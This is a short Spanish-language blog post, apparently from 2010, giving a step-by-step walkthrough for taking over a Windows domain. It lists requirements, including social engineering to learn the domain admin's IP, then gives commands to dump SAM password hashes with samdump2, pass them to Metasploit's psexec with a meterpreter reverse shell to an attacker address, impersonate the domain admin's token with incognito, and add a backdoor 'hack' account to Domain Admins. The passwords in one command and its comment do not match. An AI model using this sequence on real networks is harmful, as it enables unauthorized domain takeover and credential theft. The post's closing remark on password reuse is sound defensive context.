23 de febrero de 2010

Tomar control de un dominio de windows

REQUISITOS
Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
Una copia de BackTrack 4
Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

mount /dev/sda1 /mnt/sda1--->Montamos la particion de la maquina windows
cd /mnt/sda1/WINDOWS/system32/config--->accedemos a la carpeta dodne se encuentra el archivo SAM
samdump2 system SAM-->sacamos los hash de los usuarios en la maquina windows
msfconsole-->ejecutamos el metasploit por consola
use windows/smb/psexec--->utilizamos el psexec
exploit -p windows/meterpreter/reverse_tcp -o--->utilizamos la shell meterpreter
LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j---->configuramos las opciones del exploit
sessions -i 1---->una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
use incognito--->utilizamos el modulo incognito de meterpreter
list_tokens -u--->mostramos los tokens
impersonate_token mydomain\domainadmin--->tomamos las credenciales del administrador de dominio
execute -f cmd.exe -i -t--->lanzamos la consola de windows
net user hack MPass5678 /add /domain-->Agregamos el usuario “hack” con clave “MPass46782″ al dominio
net group “Domain Admins” hack /add /domain-->metemos el usuario hack al grupo de administradores de dominio
Ya hemos tomado el control del dominio de windows
Este ataque es compatible con WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

No hay comentarios: